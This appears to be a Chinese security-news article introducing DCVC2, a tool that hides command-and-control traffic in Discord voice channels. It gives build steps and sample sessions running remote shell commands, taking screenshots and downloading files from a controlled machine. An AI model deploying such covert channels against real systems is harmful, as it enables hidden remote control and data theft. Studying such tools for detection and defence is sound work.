如何使用DCVC2实现C2控制命令和数据的隐蔽传输


关于DCVC2

DCVC2是一款功能强大的数据传输工具,该工具可以通过语音信道并使用RTP分组来传输所有数据,而且整个过程不会在文字聊天中留下操作痕迹。

该工具能够与多种常见的操作系统兼容,并且能够利用Discord的语音通道发送数据以实现命令和控制操作。该工具基于DiscordGo实现其功能,且完全通过实时协议(RTP)运行,是一款基于命令行运行的工具,这也就意味着所有的操作都需要通过Windows/Linux/OSX上的终端来执行。

工具要求

1、一个Discord账号;

2、一台Discord服务器;

3、支持在设置中将语音聊天速度提高到96kbps;

4、两个Discord bot(需要给bot提供管理员权限:【文档】);

工具下载

由于该工具基于Go语言开发,因此我们首先需要在本地设备上安装并配置好Go语言环境。

接下来,广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/3NailsInfoSec/DCVC2.git

然后切换到项目目录中,使用go build命令完成服务器端和代理端代码编译:

cd DCVC2

go mod download

 

go build server.go

 

go build agent.go

工具使用

运行完DCVC2的服务器端和代理端之后,你将会看到两端都加入了指定的语音聊天频道:

Shell命令执行:

cmd> whoami

 

 

 

 

desktop-3kjj3kj\sm00v

除了基本的Shell用法之外,DCVC2还添加了两个硬编码的附加项:

cmd> screenshot

 

 

screenshotting..............................................

 

 

 

&

 

 

 

cmd> download

 

download file path>C:\Users\sm00v\Downloads\34954477.jpg

 

............................................................

项目地址

DCVC2:【GitHub传送门

参考资料

https://stealthbits.com/stealthaudit-for-active-directory-product/(https://github.com/bwmarrin/discordgo)

https://www.3nailsinfosec.com/post/using-discord-s-voice-channel-for-c2-operations

https://discordpy.readthedocs.io/en/stable/discord.html

https://twitter.com/sm00v

https://github.com/sm00v

 


中央网信办印发《网站平台受理处置涉企网络侵权信息举报工作规范》

揭秘南亚新 APT 组织 APT-K-47 “神秘象”

获取更多资讯请加入交流群


    协助本站SEO优化一下,谢谢!
    关键词不能为空
评 论
更换验证码